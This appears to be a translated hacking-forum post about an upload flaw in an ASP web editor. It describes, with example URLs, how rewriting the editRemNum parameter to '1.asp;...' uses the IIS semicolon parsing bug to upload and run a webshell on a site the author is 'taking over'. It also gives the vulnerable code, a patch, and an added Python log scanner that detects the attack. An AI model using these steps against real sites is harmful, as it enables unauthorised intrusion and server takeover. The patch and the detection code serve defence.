This editor is quite rudimentary. I came across it this afternoon while taking over a site: there was no database backup feature and nowhere to upload a webshell directly. The back end was so shabby that it had only an editor interface.
Here is a brief description of how it is used. Clicking image upload brings up the upload page, whose address is
After an ordinary picture is uploaded, its address is <http://www.xxx.cn/news/uppic/41513102009204012_1.gif>
Note the path at this point.
Click image upload again, and this time the address becomes http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
Clearly, the address of the picture is generated from the number that follows RemNum.
Exploitation is very simple when combined with the IIS parsing vulnerability: change the value after RemNum to 1.asp;41513102009204012
so that it becomes the following address
Then open it in the browser.
Then select your script trojan and upload it.
The following address is returned: uppic/1.asp;41513102009204012_2.gif
Opening that directly gives the address of our small webshell!
Here is the patch method as well!
by:think you're blocking stopper to break the wall
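
    ' Vulnerable: when the editRemNum request parameter is present, it is used unchanged as the file name prefix
    if editRemNum<>"" then
        remNum = editRemNum
    else
        Randomize
        remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
    end if
    remFileName = remNum&"_"&(editImageNum+1)&".gif"
    end if ' closes an If that begins outside this excerpt
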
Heh, I won't explain it for now.
Remove the section that takes the value from the parameter, leaving only the following:

    ' Patched: remNum is always generated on the server; editRemNum is no longer used
    Randomize
    remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
    remFileName = remNum&"_"&(editImageNum+1)&".gif"
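
To check whether a server running the unpatched editor has already seen this, here is an added example (not from the original post) that scans W3C-format IIS logs for the two request shapes shown above: a non-numeric editRemNum sent to uploadPic.asp, and a path segment with a script extension directly before a ';'. The log lines are constructed from the post's example values, and the field layout and the `SCRIPT_EXTS` list are assumptions to adapt to your own server.

```python
import re
from urllib.parse import unquote

# Constructed W3C-format IIS log lines; paths and values mirror the post's example.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2009-10-13 20:40:12 GET /news/admin/uploadPic.asp language=&editImageNum=1&editRemNum=41513102009204012 200
2009-10-13 20:41:03 GET /news/admin/uploadPic.asp language=&editImageNum=1&editRemNum=1.asp;41513102009204012 200
2009-10-13 20:41:40 GET /news/uppic/41513102009204012_1.gif - 200
2009-10-13 20:42:05 GET /news/uppic/1.asp;41513102009204012_2.gif - 200
"""

# Assumption: only .asp is listed because it is the extension the post uses;
# add any other extension mapped to a script handler on your server.
SCRIPT_EXTS = ("asp",)
SCRIPT_SEMICOLON = re.compile(r"\.(?:%s);" % "|".join(SCRIPT_EXTS), re.I)

def parse_query(query):
    """Split a raw query string on '&' only, so a ';' stays inside its value."""
    pairs = (p.partition("=") for p in query.split("&") if p and p != "-")
    return {key: unquote(value) for key, _, value in pairs}

def scan(log_text):
    """Return (line_number, reason) for each request matching the post's pattern."""
    fields, findings = [], []
    for no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the lines below
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        stem = unquote(rec.get("cs-uri-stem", ""))
        rem = parse_query(rec.get("cs-uri-query", "")).get("editRemNum", "")
        # The legitimate value is the all-digit string the editor generates.
        if stem.lower().endswith("/uploadpic.asp") and rem and not re.fullmatch(r"[0-9]+", rem):
            findings.append((no, "non-numeric editRemNum: " + rem))
        # A stored file named like a script followed by ';' in one path segment.
        if any(SCRIPT_SEMICOLON.search(seg) for seg in stem.split("/")):
            findings.append((no, "script extension before ';' in path: " + stem))
    return findings

if __name__ == "__main__":
    for no, reason in scan(SAMPLE_LOG):
        print(no, reason)
```

Any hit on the second rule under the upload directory means a file with that name was requested there, so the directory listing should be reviewed as well as the logs.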